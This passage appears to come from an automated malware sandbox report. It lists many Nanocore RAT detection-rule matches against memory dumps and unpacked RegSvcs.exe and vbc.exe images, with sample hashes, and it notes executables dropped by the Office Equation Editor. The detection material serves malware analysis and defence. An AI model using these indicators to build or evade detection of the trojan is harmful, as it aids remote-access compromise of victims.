Source: 7.2.RegSvcs.exe.750000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26e6198.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.780000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.750000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.7b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.cd0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26f23d8.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26f23d8.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.cd0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.d00000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.38db858.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.12a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.38db858.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.472e8a4.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.d00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26e6198.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26e6198.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.6f0000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.26e1340.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26e1340.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675802769.00000000012A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675222027.00000000007A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675311238.0000000000B70000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.675233867.00000000007B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675131963.00000000006F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675241372.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675167129.0000000000750000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.676573390.0000000004720000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675197443.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675397624.0000000000D00000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exeJump to dropped file
Source: 7.2.RegSvcs.exe.6f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.6f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.b70000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.b70000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.4724c9f.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.4724c9f.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.26f23d8.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.26f23d8.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.7a0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.7a0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.7c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.7c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.7a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.7a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.4720000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.4720000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.12a0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.12a0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.4720000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.4720000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.b70000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.b70000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.750000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.750000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.26e6198.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.26e6198.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.780000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.780000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.750000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.750000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.7b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.7b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.cd0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.cd0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.26f23d8.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.26f23d8.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.cd0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.cd0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
